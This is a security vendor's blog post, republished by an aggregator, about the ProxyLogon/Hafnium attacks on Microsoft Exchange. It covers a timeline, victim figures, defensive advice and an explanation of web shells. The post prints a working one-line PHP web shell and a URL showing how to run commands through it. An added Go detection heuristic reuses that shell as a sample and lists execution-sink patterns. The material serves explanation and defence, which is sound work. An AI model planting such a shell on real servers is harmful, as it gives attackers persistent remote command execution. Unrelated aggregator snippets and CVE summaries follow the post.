Only last week we posted a blog about multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Seeing how this disclosure came with a patch being available, under normal circumstances you would see some companies update quickly and others would dally until it bubbled up to the top of their to-do list.

This attack method, called ProxyLogon and attributed to a group called Hafnium, was different. It went from “limited and targeted attacks” to a full-size panic in no time. Attackers are using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

How did this situation evolve? A timeline

To demonstrate how this situation came about we want to show you this timeline of developments:

  • December 2020, CVE-2021-26855 is discovered by DEVCORE, which names the vulnerability ProxyLogon.
  • January 2021, DEVCORE sends an advisory and exploit to Microsoft through the MSRC portal.
  • January 2021, Volexity and Dubex start to see exploitation of Exchange vulnerabilities.
  • January 27, 2021, Dubex shares its findings with Microsoft.
  • February 2, 2021, Volexity informs Microsoft of its findings.
  • March 2, 2021, Microsoft publishes a patch and advisory, which has been updated a few times since then.
  • March 4, 2021, the Cybersecurity and Infrastructure Security Agency (CISA) issues an emergency directive after CISA partners observe active exploitation of vulnerabilities in Microsoft Exchange on-premises products.
  • March 5, 2021, Microsoft and many security vendors see increased use of these vulnerabilities in attacks targeting unpatched systems, by multiple malicious actors, not just Hafnium.
  • March 8, 2021, CISA issues a warning that it is aware of widespread domestic and international exploitation of these vulnerabilities.

The attacks went from a limited Advanced Persistent Threat (APT) used against targeted victims to cryptomining operations run by “common” cybercriminals in no time flat.

What often happens after vulnerabilities get disclosed and patched is that criminals reverse engineer the fix to create their own copycat exploits, so they can attack while systems are unpatched. Sometimes it takes a lot of skill and perseverance to get a vulnerability to work for you, but looking at the rapid introduction of these Exchange exploits into the threat landscape, this one looks like a piece of cake.

Victims

As of 8 March, Malwarebytes had detected malicious web shells on close to 1,000 unique machines already. Although most of the recorded attacks have occurred in the United States, organizations in other countries are under attack as well.

Figure: Instances found of Backdoor.Hafnium (web shells detected worldwide)

Chris Krebs, the former director of CISA, reckons government agencies and small businesses will be more affected by these attacks than large enterprises. Enterprises tend to use different software than on-premises Exchange Servers.

Figure: Distribution of Backdoor.Hafnium detections by country, as of 8 March 2021

But Brian Krebs, in a post on his site, states that the Hafnium hackers have accelerated attacks on vulnerable Exchange servers since Microsoft released the patches. His sources told him that 30,000 organizations in the US have been hacked as part of this campaign.

Web shells

A web shell is a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)

Web shells don’t attack or exploit a remote vulnerability, they are always the second step of an attack. Even if it opens the door to further exploitation, a web shell itself is always dropped after an initial exploitation.

Web shell scripts can be written in any of the programming languages designed for use on the web. You will find PHP, ASP, Perl, and many others. Attackers who successfully use web shells take advantage of the fact that many organizations do not have complete visibility into the HTTP sessions on their servers. And most web shells are basically non-executable files, which can make it hard for traditional antivirus software to detect them. The tiniest web shell in PHP on record is only this big:

<?=`$_GET[1]`?>

A shell like this will simply execute whatever command an attacker sends to the compromised server. They run it by calling the script in their browser, or from a command line HTTP client. For example, the following URL would cause the tiny web shell above, running on example.com, to execute whatever replaces {command}:

www.example.com/index.html?1={command}

As you can see the use of this type of backdoor is easy. Once you have planted the web shell, you can use it to create additional web shells or steal information from the server.

What can we do?

Patch as soon as you can.

Microsoft’s team has published a script on GitHub that can check the security status of Exchange servers. The script has been updated to include indicators of compromise (IOCs) linked to the four zero-day vulnerabilities found in Microsoft Exchange Server.

It was important to patch last week, when it was just targeted attacks, but it’s all the more urgent now that it’s the wild west out there. If you can’t patch your Exchange server, block internet access to it, or restrict access to it by blocking untrusted connections or putting the server behind your VPN.

Scan your server for the presence of malicious web shells. Security vendors have added detection for the publicly posted IOCs and some will detect other malicious web shells as well.

Malwarebytes’ generic detection name for malicious web shells is Backdoor.WebShell and the detection name for the web shells that are tied directly to the Hafnium group is Backdoor.Hafnium.
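A file-scanning heuristic of the kind that catches the one-line PHP shell quoted above, as an added example in Go that is not Malwarebytes’ code and encodes no Hafnium indicators: a script is flagged only when request input and a code- or command-execution sink occur in the same file, since either alone is common in legitimate code. The sample files are constructed.

```go
package main

import (
	"path"
	"regexp"
	"strings"
)

// Finding explains why a file was flagged: the request-input source and the
// execution sink found together in it.
type Finding struct {
	Path, Source, Sink string
}

// Attacker-controlled input: request parameters in PHP and ASP/ASP.NET pages.
var sources = map[string]*regexp.Regexp{
	"php":  regexp.MustCompile(`\$_(GET|POST|REQUEST|COOKIE)\b`),
	"aspx": regexp.MustCompile(`\bRequest(\.(Form|QueryString|Item|Headers))?\s*[\[(]`),
}

// Execution sinks. The PHP pattern includes the backtick operator with an
// interpolated variable, which is the only sink in the one-line shell.
var sinks = map[string]*regexp.Regexp{
	"php":  regexp.MustCompile("`[^`\\n]*\\$[^`\\n]*`|\\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\\s*\\("),
	"aspx": regexp.MustCompile(`\b(Eval|Execute|Process\.Start|ProcessStartInfo)\b`),
}

// SampleFiles are constructed inputs, not material from any real incident.
var SampleFiles = map[string]string{
	"uploads/1.php":   "<?=`$_GET[1]`?>",                                                 // the one-liner from the text
	"contact.php":     "<?php echo htmlspecialchars($_GET['name']); ?>",                  // input, no sink
	"cron/report.php": "<?php exec('ls -l /var/log', $out); print_r($out); ?>",          // sink, no input
	"default.aspx":    `<%@ Page Language="C#" %><% Response.Write(Request["q"]); %>`, // input, no sink
	"README.md":       "not a script",
}

// langOf maps a file extension to a rule set; unknown types are skipped.
func langOf(name string) string {
	switch strings.ToLower(path.Ext(name)) {
	case ".php", ".phtml", ".php5":
		return "php"
	case ".aspx", ".asp", ".ashx", ".asmx":
		return "aspx"
	}
	return ""
}

// Scan flags a file only when both a source and a sink match. This is a triage
// heuristic, not proof: obfuscated shells must be decoded before scanning, and
// every hit still needs a human to read the file.
func Scan(files map[string]string) []Finding {
	var out []Finding
	for name, body := range files {
		lang := langOf(name)
		if lang == "" {
			continue
		}
		src := sources[lang].FindString(body)
		sink := sinks[lang].FindString(body)
		if src != "" && sink != "" {
			out = append(out, Finding{Path: name, Source: src, Sink: sink})
		}
	}
	return out
}
```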

Figure: Malwarebytes (Nebula) detecting Backdoor.Hafnium

Stay safe, everyone!

The post Microsoft Exchange attacks cause panic as criminals go shell collecting appeared first on Malwarebytes Labs.




https://malwaredevil.com/2021/03/09/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting-2/?utm_source=rss&utm_medium=rss&utm_campaign=microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting-2


Dark Reading ‘Name That Toon’ Winner: Gather ‘Round the Campfire

Enterprise Vulnerabilities
From DHS/US-CERT’s National Vulnerability Database
CVE-2021-21369
PUBLISHED: 2021-03-09

Hyperledger Besu is an open-source, MainNet compatible, Ethereum client written in Java. In Besu before version 1.5.1 there is a denial-of-service vulnerability involving the HTTP JSON-RPC API service. If username and password authentication is enabled for the HTTP JSON-RPC API service, then prior t…

CVE-2021-21176
PUBLISHED: 2021-03-09

Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.

CVE-2021-21177
PUBLISHED: 2021-03-09

Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.

CVE-2021-21178
PUBLISHED: 2021-03-09

Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.

CVE-2021-21179
PUBLISHED: 2021-03-09

Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.




https://malwaredevil.com/2021/03/09/dark-reading-name-that-toon-winner-gather-round-the-campfire/?utm_source=rss&utm_medium=rss&utm_campaign=dark-reading-name-that-toon-winner-gather-round-the-campfire

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...